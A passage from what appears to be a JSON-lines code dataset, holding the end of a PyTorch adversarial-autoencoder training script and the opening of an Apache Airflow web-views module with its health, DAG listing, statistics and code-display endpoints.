samples):\n\n assert samples.nelement() == samples.size(1) * samples.size(0), '?'\n\n samples = samples.view(samples.size(0), -1)\n\n self.samples_var = utils.var(samples)\n self.samples_mean = samples.mean(0)\n\n samples_mean = self.samples_mean\n samples_var = self.samples_var\n\n if self.direction == 'pq':\n t1 = (1 + samples_mean.pow(2)) / (2 * samples_var.pow(2))\n t2 = samples_var.log()\n\n KL = (t1 + t2 - 0.5).mean()\n else:\n # In the AGE implementation, there is samples_var^2 instead of samples_var^1\n t1 = (samples_var + samples_mean.pow(2)) / 2\n # In the AGE implementation, this did not have the 0.5 scaling factor:\n t2 = -0.5*samples_var.log()\n\n KL = (t1 + t2 - 0.5).mean()\n\n if not self.minimize:\n KL *= -1\n\n return KL\n\ndef train(generator, encoder, g_running, train_data_loader, test_data_loader, session, total_steps, train_mode):\n pbar = tqdm(initial=session.sample_i, total = total_steps)\n \n benchmarking = False\n \n match_x = args.match_x\n generatedImagePool = None\n\n refresh_dataset = True\n refresh_imagePool = True\n\n # After the Loading stage, we cycle through successive Fade-in and Stabilization stages\n\n batch_count = 0\n\n reset_optimizers_on_phase_start = False\n\n # TODO Unhack this (only affects the episode count statistics anyway):\n if args.data != 'celebaHQ':\n epoch_len = len(train_data_loader(1,4).dataset)\n else:\n epoch_len = train_data_loader._len['data4x4']\n\n if args.step_offset != 0:\n if args.step_offset == -1:\n args.step_offset = session.sample_i\n print(\"Step offset is {}\".format(args.step_offset))\n session.phase += args.phase_offset\n session.alpha = 0.0\n\n while session.sample_i < total_steps:\n ####################### Phase Maintenance ####################### \n\n steps_in_previous_phases = max(session.phase * args.images_per_stage, args.step_offset)\n\n sample_i_current_stage = session.sample_i - steps_in_previous_phases\n\n # If we can move to the next phase\n if sample_i_current_stage >= args.images_per_stage:\n if session.phase < args.max_phase: # If any phases left\n iteration_levels = int(sample_i_current_stage / args.images_per_stage)\n session.phase += iteration_levels\n sample_i_current_stage -= iteration_levels * args.images_per_stage\n match_x = args.match_x # Reset to non-matching phase\n print(\"iteration B alpha={} phase {} will be reduced to 1 and [max]\".format(sample_i_current_stage, session.phase))\n\n refresh_dataset = True\n refresh_imagePool = True # Reset the pool to avoid images of 2 different resolutions in the pool\n\n if reset_optimizers_on_phase_start:\n utils.requires_grad(generator)\n utils.requires_grad(encoder)\n generator.zero_grad()\n encoder.zero_grad()\n session.reset_opt()\n print(\"Optimizers have been reset.\") \n\n reso = 4 * 2 ** session.phase\n\n # If we can switch from fade-training to stable-training\n if sample_i_current_stage >= args.images_per_stage/2:\n if session.alpha < 1.0:\n refresh_dataset = True # refresh dataset generator since no longer have to fade\n match_x = args.match_x * args.matching_phase_x\n else:\n match_x = args.match_x\n\n session.alpha = min(1, sample_i_current_stage * 2.0 / args.images_per_stage) # For 100k, it was 0.00002 = 2.0 / args.images_per_stage\n\n if refresh_dataset:\n train_dataset = data.Utils.sample_data2(train_data_loader, batch_size(reso), reso, session)\n refresh_dataset = False\n print(\"Refreshed dataset. 
Alpha={} and iteration={}\".format(session.alpha, sample_i_current_stage))\n if refresh_imagePool:\n imagePoolSize = 200 if reso < 256 else 100\n generatedImagePool = utils.ImagePool(imagePoolSize) #Reset the pool to avoid images of 2 different resolutions in the pool\n refresh_imagePool = False\n print('Image pool created with size {} because reso is {}'.format(imagePoolSize, reso))\n\n ####################### Training init ####################### \n\n z = Variable( torch.FloatTensor(batch_size(reso), args.nz, 1, 1) ).cuda(non_blocking=(args.gpu_count>1))\n KL_minimizer = KLN01Loss(direction=args.KL, minimize=True)\n KL_maximizer = KLN01Loss(direction=args.KL, minimize=False)\n \n stats = {}\n\n one = torch.FloatTensor([1]).cuda(non_blocking=(args.gpu_count>1))\n\n try:\n real_image, _ = next(train_dataset) \n except (OSError, StopIteration):\n train_dataset = data.Utils.sample_data2(train_data_loader, batch_size(reso), reso, session)\n real_image, _ = next(train_dataset)\n\n ####################### DISCRIMINATOR / ENCODER ###########################\n\n utils.switch_grad_updates_to_first_of(encoder, generator)\n encoder.zero_grad()\n\n x = Variable(real_image).cuda(non_blocking=(args.gpu_count>1))\n kls = \"\"\n if train_mode == config.MODE_GAN:\n \n # Discriminator for real samples\n real_predict, _ = encoder(x, session.phase, session.alpha, args.use_ALQ)\n real_predict = real_predict.mean() \\\n - 0.001 * (real_predict ** 2).mean()\n real_predict.backward(-one) # Towards 1\n\n # (1) Generator => D. Identical to (2) see below\n \n fake_predict, fake_image = D_prediction_of_G_output(generator, encoder, session.phase, session.alpha)\n fake_predict.backward(one)\n\n # Grad penalty\n\n grad_penalty = get_grad_penalty(encoder, x, fake_image, session.phase, session.alpha)\n grad_penalty.backward()\n\n elif train_mode == config.MODE_CYCLIC:\n e_losses = []\n\n # e(X)\n \n real_z = encoder(x, session.phase, session.alpha, args.use_ALQ)\n if args.use_real_x_KL:\n # KL_real: - \\Delta( e(X) , Z ) -> max_e\n KL_real = KL_minimizer(real_z) * args.real_x_KL_scale\n e_losses.append(KL_real)\n\n stats['real_mean'] = KL_minimizer.samples_mean.data.mean()\n stats['real_var'] = KL_minimizer.samples_var.data.mean()\n stats['KL_real'] = KL_real.data.item()\n kls = \"{0:.3f}\".format(stats['KL_real'])\n\n # The final entries are the label. Normal case, just 1. Extract it/them, and make it [b x 1]:\n\n real_z, label = utils.split_labels_out_of_latent(real_z)\n recon_x = generator(real_z, label, session.phase, session.alpha)\n if args.use_loss_x_reco:\n # match_x: E_x||g(e(x)) - x|| -> min_e\n err = utils.mismatch(recon_x, x, args.match_x_metric) * match_x\n e_losses.append(err)\n stats['x_reconstruction_error'] = err.item()\n\n args.use_wpgan_grad_penalty = False\n grad_penalty = 0.0\n \n if args.use_loss_fake_D_KL:\n # TODO: The following codeblock is essentially the same as the KL_minimizer part on G side. 
Unify\n utils.populate_z(z, args.nz+args.n_label, args.noise, batch_size(reso))\n z = torch.squeeze(z)\n z, label = utils.split_labels_out_of_latent(z)\n fake = generator(z, label, session.phase, session.alpha).detach()\n\n if session.alpha >= 1.0:\n fake = generatedImagePool.query(fake.data)\n\n # e(g(Z))\n egz = encoder(fake, session.phase, session.alpha, args.use_ALQ)\n\n # KL_fake: \\Delta( e(g(Z)) , Z ) -> max_e\n KL_fake = KL_maximizer(egz) * args.fake_D_KL_scale\n e_losses.append(KL_fake)\n\n stats['fake_mean'] = KL_maximizer.samples_mean.data.mean()\n stats['fake_var'] = KL_maximizer.samples_var.data.mean()\n stats['KL_fake'] = -KL_fake.item()\n kls = \"{0}/{1:.3f}\".format(kls, stats['KL_fake'])\n\n if args.use_wpgan_grad_penalty:\n grad_penalty = get_grad_penalty(encoder, x, fake, session.phase, session.alpha)\n \n # Update e\n if len(e_losses) > 0:\n e_loss = sum(e_losses) \n stats['E_loss'] = np.float32(e_loss.cpu().detach().numpy())\n e_loss.backward()\n\n if args.use_wpgan_grad_penalty:\n grad_penalty.backward()\n stats['Grad_penalty'] = grad_penalty.data\n\n #book-keeping\n disc_loss_val = e_loss.item()\n\n session.optimizerD.step()\n\n torch.cuda.empty_cache()\n\n ######################## GENERATOR / DECODER #############################\n \n if (batch_count + 1) % args.n_critic == 0:\n utils.switch_grad_updates_to_first_of(generator, encoder)\n\n for _ in range(args.n_generator):\n generator.zero_grad()\n g_losses = []\n \n if train_mode == config.MODE_GAN:\n fake_predict, _ = D_prediction_of_G_output(generator, encoder, session.phase, session.alpha)\n loss = -fake_predict\n g_losses.append(loss)\n \n elif train_mode == config.MODE_CYCLIC: #TODO We push the z variable around here like idiots\n def KL_of_encoded_G_output(generator, z):\n utils.populate_z(z, args.nz+args.n_label, args.noise, batch_size(reso))\n z, label = utils.split_labels_out_of_latent(z) \n fake = generator(z, label, session.phase, session.alpha)\n \n egz = encoder(fake, session.phase, session.alpha, args.use_ALQ)\n # KL_fake: \\Delta( e(g(Z)) , Z ) -> min_g\n return egz, label, KL_minimizer(egz) * args.fake_G_KL_scale, z\n\n egz, label, kl, z = KL_of_encoded_G_output(generator, z)\n\n if args.use_loss_KL_z:\n g_losses.append(kl) # G minimizes this KL\n stats['KL(Phi(G))'] = kl.item()\n kls = \"{0}/{1:.3f}\".format(kls, stats['KL(Phi(G))'])\n\n if args.use_loss_z_reco:\n z = torch.cat((z, label), 1)\n z_diff = utils.mismatch(egz, z, args.match_z_metric) * args.match_z # G tries to make the original z and encoded z match\n g_losses.append(z_diff) \n\n if len(g_losses) > 0:\n loss = sum(g_losses)\n stats['G_loss'] = np.float32(loss.cpu().detach().numpy())\n loss.backward()\n\n # Book-keeping only:\n gen_loss_val = loss.item()\n \n session.optimizerG.step()\n\n torch.cuda.empty_cache()\n\n if train_mode == config.MODE_CYCLIC:\n if args.use_loss_z_reco:\n stats['z_reconstruction_error'] = z_diff.item()\n\n accumulate(g_running, generator)\n\n del z, x, one, real_image, real_z, KL_real, label, recon_x, fake, egz, KL_fake, kl, z_diff\n\n if train_mode == config.MODE_CYCLIC:\n if args.use_TB:\n for key,val in stats.items(): \n writer.add_scalar(key, val, session.sample_i)\n elif batch_count % 100 == 0:\n print(stats)\n\n if args.use_TB:\n writer.add_scalar('LOD', session.phase + session.alpha, session.sample_i)\n\n ######################## Statistics ######################## \n\n b = batch_size_by_phase(session.phase)\n zr, xr = (stats['z_reconstruction_error'], stats['x_reconstruction_error']) if train_mode == 
config.MODE_CYCLIC else (0.0, 0.0)\n e = (session.sample_i / float(epoch_len))\n pbar.set_description(\n ('{0}; it: {1}; phase: {2}; b: {3:.1f}; Alpha: {4:.3f}; Reso: {5}; E: {6:.2f}; KL(real/fake/fakeG): {7}; z-reco: {8:.2f}; x-reco {9:.3f}; real_var {10:.4f}').format(batch_count+1, session.sample_i+1, session.phase, b, session.alpha, reso, e, kls, zr, xr, stats['real_var'])\n )\n #(f'{i + 1}; it: {iteration+1}; b: {b:.1f}; G: {gen_loss_val:.5f}; D: {disc_loss_val:.5f};'\n # f' Grad: {grad_loss_val:.5f}; Alpha: {alpha:.3f}; Reso: {reso}; S-mean: {real_mean:.3f}; KL(real/fake/fakeG): {kls}; z-reco: {zr:.2f}'))\n\n pbar.update(batch_size(reso))\n session.sample_i += batch_size(reso) # if not benchmarking else 100\n batch_count += 1\n\n ######################## Saving ######################## \n\n if batch_count % args.checkpoint_cycle == 0:\n for postfix in {'latest', str(session.sample_i).zfill(6)}:\n session.save_all('{}/{}_state'.format(args.checkpoint_dir, postfix))\n\n print(\"Checkpointed to {}\".format(session.sample_i))\n\n ######################## Tests ######################## \n\n try:\n evaluate.tests_run(g_running, encoder, test_data_loader, session, writer,\n reconstruction = (batch_count % 800 == 0),\n interpolation = (batch_count % 800 == 0),\n collated_sampling = (batch_count % 800 == 0),\n individual_sampling = (batch_count % (args.images_per_stage/batch_size(reso)/4) == 0)\n )\n except (OSError, StopIteration):\n print(\"Skipped periodic tests due to an exception.\")\n\n pbar.close()\n\ndef main():\n setup()\n session = Session()\n session.create()\n\n print('PyTorch {}'.format(torch.__version__))\n\n if args.train_path:\n train_data_loader = data.get_loader(args.data, args.train_path)\n else:\n train_data_loader = None\n \n if args.test_path:\n test_data_loader = data.get_loader(args.data, args.test_path)\n elif args.aux_inpath:\n test_data_loader = data.get_loader(args.data, args.aux_inpath)\n else:\n test_data_loader = None\n\n # 4 modes: Train (with data/train), test (with data/test), aux-test (with custom aux_inpath), dump-training-set\n \n if args.run_mode == config.RUN_TRAIN:\n train(session.generator, session.encoder, session.g_running, train_data_loader, test_data_loader,\n session = session,\n total_steps = args.total_kimg * 1000,\n train_mode = args.train_mode)\n elif args.run_mode == config.RUN_TEST:\n if args.reconstructions_N > 0 or args.interpolate_N > 0:\n evaluate.Utils.reconstruction_dryrun(session.generator, session.encoder, test_data_loader, session=session)\n evaluate.tests_run(session.generator, session.encoder, test_data_loader, session=session, writer=writer)\n elif args.run_mode == config.RUN_DUMP:\n session.phase = args.start_phase\n data.dump_training_set(train_data_loader, args.dump_trainingset_N, args.dump_trainingset_dir, session)\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a2ec6d541179c18d0ecd204d4a93792951a8923", "content": "#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. 
You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\n\nimport copy\nimport itertools\nimport json\nimport logging\nimport math\nimport os\nimport pkgutil\nimport socket\nimport traceback\nfrom collections import defaultdict\nfrom datetime import datetime, timedelta\nfrom typing import Dict, List, Optional, Tuple\nfrom urllib.parse import quote, unquote\n\nimport lazy_object_proxy\nimport markdown\nimport sqlalchemy as sqla\nfrom flask import (\n Markup, Response, escape, flash, jsonify, make_response, redirect, render_template, request,\n session as flask_session, url_for,\n)\nfrom flask_appbuilder import BaseView, ModelView, expose, has_access, permission_name\nfrom flask_appbuilder.actions import action\nfrom flask_appbuilder.models.sqla.filters import BaseFilter\nfrom flask_babel import lazy_gettext\nfrom jinja2.utils import htmlsafe_json_dumps # type: ignore\nfrom pygments import highlight, lexers\nfrom pygments.formatters import HtmlFormatter\nfrom sqlalchemy import and_, desc, func, or_, union_all\nfrom sqlalchemy.orm import joinedload\nfrom wtforms import SelectField, validators\n\nimport airflow\nfrom airflow import models, settings\nfrom airflow._vendor import nvd3\nfrom airflow.api.common.experimental.mark_tasks import (\n set_dag_run_state_to_failed, set_dag_run_state_to_success,\n)\nfrom airflow.configuration import AIRFLOW_CONFIG, conf\nfrom airflow.exceptions import AirflowException\nfrom airflow.executors.executor_loader import ExecutorLoader\nfrom airflow.jobs.base_job import BaseJob\nfrom airflow.jobs.scheduler_job import SchedulerJob\nfrom airflow.models import Connection, DagModel, DagTag, Log, SlaMiss, TaskFail, XCom, errors\nfrom airflow.models.dagcode import DagCode\nfrom airflow.models.dagrun import DagRun, DagRunType\nfrom airflow.settings import STORE_SERIALIZED_DAGS\nfrom airflow.ti_deps.dep_context import DepContext\nfrom airflow.ti_deps.dependencies_deps import RUNNING_DEPS, SCHEDULER_QUEUED_DEPS\nfrom airflow.utils import timezone\nfrom airflow.utils.dates import infer_time_unit, scale_time_units\nfrom airflow.utils.helpers import alchemy_to_dict, render_log_filename\nfrom airflow.utils.session import create_session, provide_session\nfrom airflow.utils.state import State\nfrom airflow.www import utils as wwwutils\nfrom airflow.www.app import appbuilder\nfrom airflow.www.decorators import action_logging, gzipped, has_dag_access\nfrom airflow.www.forms import (\n ConnectionForm, DagRunForm, DateTimeForm, DateTimeWithNumRunsForm, DateTimeWithNumRunsWithDagRunsForm,\n)\nfrom airflow.www.widgets import AirflowModelListWidget\n\nPAGE_SIZE = conf.getint('webserver', 'page_size')\nFILTER_TAGS_COOKIE = 'tags_filter'\nFILTER_STATUS_COOKIE = 'dag_status_filter'\n\nif os.environ.get('SKIP_DAGS_PARSING') != 'True':\n dagbag = models.DagBag(settings.DAGS_FOLDER, store_serialized_dags=STORE_SERIALIZED_DAGS)\nelse:\n dagbag = models.DagBag(os.devnull, include_examples=False)\n\n\ndef get_date_time_num_runs_dag_runs_form_data(request, session, dag):\n dttm = request.args.get('execution_date')\n if dttm:\n dttm = timezone.parse(dttm)\n else:\n dttm = dag.get_latest_execution_date(session=session) or 
timezone.utcnow()\n\n base_date = request.args.get('base_date')\n if base_date:\n base_date = timezone.parse(base_date)\n else:\n # The DateTimeField widget truncates milliseconds and would loose\n # the first dag run. Round to next second.\n base_date = (dttm + timedelta(seconds=1)).replace(microsecond=0)\n\n default_dag_run = conf.getint('webserver', 'default_dag_run_display_number')\n num_runs = request.args.get('num_runs')\n num_runs = int(num_runs) if num_runs else default_dag_run\n\n DR = models.DagRun\n drs = (\n session.query(DR)\n .filter(\n DR.dag_id == dag.dag_id,\n DR.execution_date <= base_date)\n .order_by(desc(DR.execution_date))\n .limit(num_runs)\n .all()\n )\n dr_choices = []\n dr_state = None\n for dr in drs:\n dr_choices.append((dr.execution_date.isoformat(), dr.run_id))\n if dttm == dr.execution_date:\n dr_state = dr.state\n\n # Happens if base_date was changed and the selected dag run is not in result\n if not dr_state and drs:\n dr = drs[0]\n dttm = dr.execution_date\n dr_state = dr.state\n\n return {\n 'dttm': dttm,\n 'base_date': base_date,\n 'num_runs': num_runs,\n 'execution_date': dttm.isoformat(),\n 'dr_choices': dr_choices,\n 'dr_state': dr_state,\n }\n\n\n######################################################################################\n# Error handlers\n######################################################################################\n\ndef circles(error):\n return render_template(\n 'airflow/circles.html', hostname=socket.getfqdn() if conf.getboolean(\n 'webserver',\n 'EXPOSE_HOSTNAME',\n fallback=True) else 'redact'), 404\n\n\ndef show_traceback(error):\n from airflow.utils import asciiart as ascii_\n return render_template(\n 'airflow/traceback.html',\n hostname=socket.getfqdn() if conf.getboolean(\n 'webserver',\n 'EXPOSE_HOSTNAME',\n fallback=True) else 'redact',\n nukular=ascii_.nukular,\n info=traceback.format_exc() if conf.getboolean(\n 'webserver',\n 'EXPOSE_STACKTRACE',\n fallback=True) else 'Error! 
Please contact server admin'), 500\n\n######################################################################################\n# BaseViews\n######################################################################################\n\n\nclass AirflowBaseView(BaseView):\n from airflow import macros\n route_base = ''\n\n # Make our macros available to our UI templates too.\n extra_args = {\n 'macros': macros,\n }\n\n def render_template(self, *args, **kwargs):\n return super().render_template(\n *args,\n # Cache this at most once per request, not for the lifetime of the view instance\n scheduler_job=lazy_object_proxy.Proxy(SchedulerJob.most_recent_job),\n **kwargs\n )\n\n\nclass Airflow(AirflowBaseView):\n @expose('/health')\n def health(self):\n \"\"\"\n An endpoint helping check the health status of the Airflow instance,\n including metadatabase and scheduler.\n \"\"\"\n\n payload = {\n 'metadatabase': {'status': 'unhealthy'}\n }\n\n latest_scheduler_heartbeat = None\n scheduler_status = 'unhealthy'\n payload['metadatabase'] = {'status': 'healthy'}\n try:\n scheduler_job = SchedulerJob.most_recent_job()\n\n if scheduler_job:\n latest_scheduler_heartbeat = scheduler_job.latest_heartbeat.isoformat()\n if scheduler_job.is_alive():\n scheduler_status = 'healthy'\n except Exception:\n payload['metadatabase']['status'] = 'unhealthy'\n\n payload['scheduler'] = {'status': scheduler_status,\n 'latest_scheduler_heartbeat': latest_scheduler_heartbeat}\n\n return wwwutils.json_response(payload)\n\n @expose('/home')\n @has_access\n def index(self):\n hide_paused_dags_by_default = conf.getboolean('webserver',\n 'hide_paused_dags_by_default')\n\n default_dag_run = conf.getint('webserver', 'default_dag_run_display_number')\n num_runs = request.args.get('num_runs')\n num_runs = int(num_runs) if num_runs else default_dag_run\n\n def get_int_arg(value, default=0):\n try:\n return int(value)\n except ValueError:\n return default\n\n arg_current_page = request.args.get('page', '0')\n arg_search_query = request.args.get('search', None)\n arg_tags_filter = request.args.getlist('tags', None)\n arg_status_filter = request.args.get('status', None)\n\n if request.args.get('reset_tags') is not None:\n flask_session[FILTER_TAGS_COOKIE] = None\n arg_tags_filter = None\n else:\n cookie_val = flask_session.get(FILTER_TAGS_COOKIE)\n if arg_tags_filter:\n flask_session[FILTER_TAGS_COOKIE] = ','.join(arg_tags_filter)\n elif cookie_val:\n arg_tags_filter = cookie_val.split(',')\n\n if arg_status_filter is None:\n cookie_val = flask_session.get(FILTER_STATUS_COOKIE)\n if cookie_val:\n arg_status_filter = cookie_val\n else:\n arg_status_filter = 'active' if hide_paused_dags_by_default else 'all'\n flask_session[FILTER_STATUS_COOKIE] = arg_status_filter\n else:\n status = arg_status_filter.strip().lower()\n flask_session[FILTER_STATUS_COOKIE] = status\n arg_status_filter = status\n\n dags_per_page = PAGE_SIZE\n current_page = get_int_arg(arg_current_page, default=0)\n\n start = current_page * dags_per_page\n end = start + dags_per_page\n\n # Get all the dag id the user could access\n filter_dag_ids = appbuilder.sm.get_accessible_dag_ids()\n\n with create_session() as session:\n # read orm_dags from the db\n dags_query = session.query(DagModel).filter(\n ~DagModel.is_subdag, DagModel.is_active\n )\n\n if arg_search_query:\n dags_query = dags_query.filter(\n DagModel.dag_id.ilike('%' + arg_search_query + '%') |\n DagModel.owners.ilike('%' + arg_search_query + '%')\n )\n\n if arg_tags_filter:\n dags_query = 
dags_query.filter(DagModel.tags.any(DagTag.name.in_(arg_tags_filter)))\n\n if 'all_dags' not in filter_dag_ids:\n dags_query = dags_query.filter(DagModel.dag_id.in_(filter_dag_ids))\n\n all_dags = dags_query\n active_dags = dags_query.filter(~DagModel.is_paused)\n paused_dags = dags_query.filter(DagModel.is_paused)\n\n is_paused_count = dict(\n all_dags.with_entities(DagModel.is_paused, func.count(DagModel.dag_id))\n .group_by(DagModel.is_paused).all()\n )\n status_count_active = is_paused_count.get(False, 0)\n status_count_paused = is_paused_count.get(True, 0)\n all_dags_count = status_count_active + status_count_paused\n if arg_status_filter == 'active':\n current_dags = active_dags\n num_of_all_dags = status_count_active\n elif arg_status_filter == 'paused':\n current_dags = paused_dags\n num_of_all_dags = status_count_paused\n else:\n current_dags = all_dags\n num_of_all_dags = all_dags_count\n\n dags = current_dags.order_by(DagModel.dag_id).options(\n joinedload(DagModel.tags)).offset(start).limit(dags_per_page).all()\n\n dagtags = session.query(DagTag.name).distinct(DagTag.name).all()\n tags = [\n {\"name\": name, \"selected\": bool(arg_tags_filter and name in arg_tags_filter)}\n for name, in dagtags\n ]\n\n import_errors = session.query(errors.ImportError).all()\n\n for ie in import_errors:\n flash(\n \"Broken DAG: [{ie.filename}] {ie.stacktrace}\".format(ie=ie),\n \"dag_import_error\")\n\n from airflow.plugins_manager import import_errors as plugin_import_errors\n for filename, stacktrace in plugin_import_errors.items():\n flash(\n \"Broken plugin: [{filename}] {stacktrace}\".format(\n stacktrace=stacktrace,\n filename=filename),\n \"error\")\n\n num_of_pages = int(math.ceil(num_of_all_dags / float(dags_per_page)))\n\n state_color_mapping = State.state_color.copy()\n state_color_mapping[\"null\"] = state_color_mapping.pop(None)\n\n return self.render_template(\n 'airflow/dags.html',\n dags=dags,\n current_page=current_page,\n search_query=arg_search_query if arg_search_query else '',\n page_size=dags_per_page,\n num_of_pages=num_of_pages,\n num_dag_from=min(start + 1, num_of_all_dags),\n num_dag_to=min(end, num_of_all_dags),\n num_of_all_dags=num_of_all_dags,\n paging=wwwutils.generate_pages(current_page,\n num_of_pages,\n search=escape(arg_search_query) if arg_search_query else None,\n status=arg_status_filter if arg_status_filter else None),\n num_runs=num_runs,\n tags=tags,\n state_color=state_color_mapping,\n status_filter=arg_status_filter,\n status_count_all=all_dags_count,\n status_count_active=status_count_active,\n status_count_paused=status_count_paused)\n\n @expose('/dag_stats', methods=['POST'])\n @has_access\n @provide_session\n def dag_stats(self, session=None):\n dr = models.DagRun\n\n allowed_dag_ids = appbuilder.sm.get_accessible_dag_ids()\n if 'all_dags' in allowed_dag_ids:\n allowed_dag_ids = [dag_id for dag_id, in session.query(models.DagModel.dag_id)]\n\n dag_state_stats = session.query(dr.dag_id, dr.state, sqla.func.count(dr.state))\\\n .group_by(dr.dag_id, dr.state)\n\n # Filter by post parameters\n selected_dag_ids = {\n unquote(dag_id) for dag_id in request.form.getlist('dag_ids') if dag_id\n }\n\n if selected_dag_ids:\n filter_dag_ids = selected_dag_ids.intersection(allowed_dag_ids)\n else:\n filter_dag_ids = allowed_dag_ids\n\n if not filter_dag_ids:\n return wwwutils.json_response({})\n\n payload = {}\n dag_state_stats = dag_state_stats.filter(dr.dag_id.in_(filter_dag_ids))\n data = {}\n\n for dag_id, state, count in dag_state_stats:\n if dag_id not in 
data:\n data[dag_id] = {}\n data[dag_id][state] = count\n\n for dag_id in filter_dag_ids:\n payload[dag_id] = []\n for state in State.dag_states:\n count = data.get(dag_id, {}).get(state, 0)\n payload[dag_id].append({\n 'state': state,\n 'count': count\n })\n\n return wwwutils.json_response(payload)\n\n @expose('/task_stats', methods=['POST'])\n @has_access\n @provide_session\n def task_stats(self, session=None):\n TI = models.TaskInstance\n DagRun = models.DagRun\n Dag = models.DagModel\n\n allowed_dag_ids = set(appbuilder.sm.get_accessible_dag_ids())\n\n if not allowed_dag_ids:\n return wwwutils.json_response({})\n\n if 'all_dags' in allowed_dag_ids:\n allowed_dag_ids = {dag_id for dag_id, in session.query(models.DagModel.dag_id)}\n\n # Filter by post parameters\n selected_dag_ids = {\n unquote(dag_id) for dag_id in request.form.getlist('dag_ids') if dag_id\n }\n\n if selected_dag_ids:\n filter_dag_ids = selected_dag_ids.intersection(allowed_dag_ids)\n else:\n filter_dag_ids = allowed_dag_ids\n\n RunningDagRun = (\n session.query(DagRun.dag_id, DagRun.execution_date)\n .join(Dag, Dag.dag_id == DagRun.dag_id)\n .filter(DagRun.state == State.RUNNING, Dag.is_active)\n )\n\n if selected_dag_ids:\n RunningDagRun = RunningDagRun.filter(DagRun.dag_id.in_(filter_dag_ids))\n RunningDagRun = RunningDagRun.subquery('running_dag_run')\n\n # Select all task_instances from active dag_runs.\n RunningTI = (\n session.query(TI.dag_id.label('dag_id'), TI.state.label('state'))\n .join(RunningDagRun,\n and_(RunningDagRun.c.dag_id == TI.dag_id,\n RunningDagRun.c.execution_date == TI.execution_date))\n )\n if selected_dag_ids:\n RunningTI = RunningTI.filter(TI.dag_id.in_(filter_dag_ids))\n\n if conf.getboolean('webserver', 'SHOW_RECENT_STATS_FOR_COMPLETED_RUNS', fallback=True):\n LastDagRun = (\n session.query(\n DagRun.dag_id,\n sqla.func.max(DagRun.execution_date).label('execution_date')\n )\n .join(Dag, Dag.dag_id == DagRun.dag_id)\n .filter(DagRun.state != State.RUNNING, Dag.is_active)\n .group_by(DagRun.dag_id)\n )\n\n if selected_dag_ids:\n LastDagRun = LastDagRun.filter(DagRun.dag_id.in_(filter_dag_ids))\n LastDagRun = LastDagRun.subquery('last_dag_run')\n\n # Select all task_instances from active dag_runs.\n # If no dag_run is active, return task instances from most recent dag_run.\n LastTI = (\n session.query(TI.dag_id.label('dag_id'), TI.state.label('state'))\n .join(LastDagRun,\n and_(LastDagRun.c.dag_id == TI.dag_id,\n LastDagRun.c.execution_date == TI.execution_date))\n )\n if selected_dag_ids:\n LastTI = LastTI.filter(TI.dag_id.in_(filter_dag_ids))\n\n FinalTI = union_all(LastTI, RunningTI).alias('final_ti')\n else:\n FinalTI = RunningTI.subquery('final_ti')\n\n qry = (\n session.query(FinalTI.c.dag_id, FinalTI.c.state, sqla.func.count())\n .group_by(FinalTI.c.dag_id, FinalTI.c.state)\n )\n\n data = {}\n for dag_id, state, count in qry:\n if dag_id not in data:\n data[dag_id] = {}\n data[dag_id][state] = count\n\n payload = {}\n for dag_id in filter_dag_ids:\n payload[dag_id] = []\n for state in State.task_states:\n count = data.get(dag_id, {}).get(state, 0)\n payload[dag_id].append({\n 'state': state,\n 'count': count\n })\n return wwwutils.json_response(payload)\n\n @expose('/last_dagruns', methods=['POST'])\n @has_access\n @provide_session\n def last_dagruns(self, session=None):\n DagRun = models.DagRun\n\n allowed_dag_ids = appbuilder.sm.get_accessible_dag_ids()\n\n if 'all_dags' in allowed_dag_ids:\n allowed_dag_ids = [dag_id for dag_id, in session.query(models.DagModel.dag_id)]\n\n # 
Filter by post parameters\n selected_dag_ids = {\n unquote(dag_id) for dag_id in request.form.getlist('dag_ids') if dag_id\n }\n\n if selected_dag_ids:\n filter_dag_ids = selected_dag_ids.intersection(allowed_dag_ids)\n else:\n filter_dag_ids = allowed_dag_ids\n\n if not filter_dag_ids:\n return wwwutils.json_response({})\n\n query = session.query(\n DagRun.dag_id, sqla.func.max(DagRun.execution_date).label('last_run')\n ).group_by(DagRun.dag_id)\n\n # Filter to only ask for accessible and selected dags\n query = query.filter(DagRun.dag_id.in_(filter_dag_ids))\n\n resp = {\n r.dag_id.replace('.', '__dot__'): {\n 'dag_id': r.dag_id,\n 'last_run': r.last_run.isoformat(),\n } for r in query\n }\n return wwwutils.json_response(resp)\n\n @expose('/code')\n @has_dag_access(can_dag_read=True)\n @has_access\n @provide_session\n def code(self, session=None):\n all_errors = \"\"\n\n try:\n dag_id = request.args.get('dag_id')\n dag_orm = DagModel.get_dagmodel(dag_id, session=session)\n code = DagCode.get_code_by_fileloc(dag_orm.fileloc)\n html_code = highlight(\n code, lexers.PythonLexer(), HtmlFormatter(linenos=True))\n\n except Exception as e:\n all_errors += (\n \"Exception encountered during \" +\n \"dag_id retrieval/dag retrieval fallback/code highlighting:\\n\\n{}\\n\".format(e)\n )\n html_code = '

<p>Failed to load file.</p><p>Details: {}</p>
    '.format(\n escape(all_errors))\n\n return self.render_template(\n 'airflow/dag_code.html', html_code=html_code, dag=dag_orm, title=dag_id,\n root=request.args.get('root'),\n demo_mode=conf.getboolean('webserver', 'demo_mode'),\n wrapped=conf.getboolean('webserver', 'default_wrap'))\n\n @expose('/dag_details')\n @has_dag_access(can_dag_read=True)\n @has_access\n @provide_session\n def dag_details(self, session=None):\n dag_id = request.args.get('dag_id')\n dag = dagbag.get_dag(dag_id)\n title = \"DAG details\"\n root = request.args.get('root', '')\n\n TI = models.TaskInstance\n states = (\n session.query(TI.state, sqla.func.count(TI.dag_id))\n .filter(TI.dag_id == dag_id)\n .group_by(TI.state)\n .all()\n )\n\n active_runs = models.DagRun.find(\n dag_id=dag_id,\n state=State.RUNNING,\n external_trigger=False\n )\n\n return self.render_template(\n 'airflow/dag_details.html',\n dag=dag, title=title, root=root, states=states, State=State, active_runs=active_runs)\n\n @expose('/rendered')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n def rendered(self):\n dag_id = request.args.get('dag_id')\n task_id = 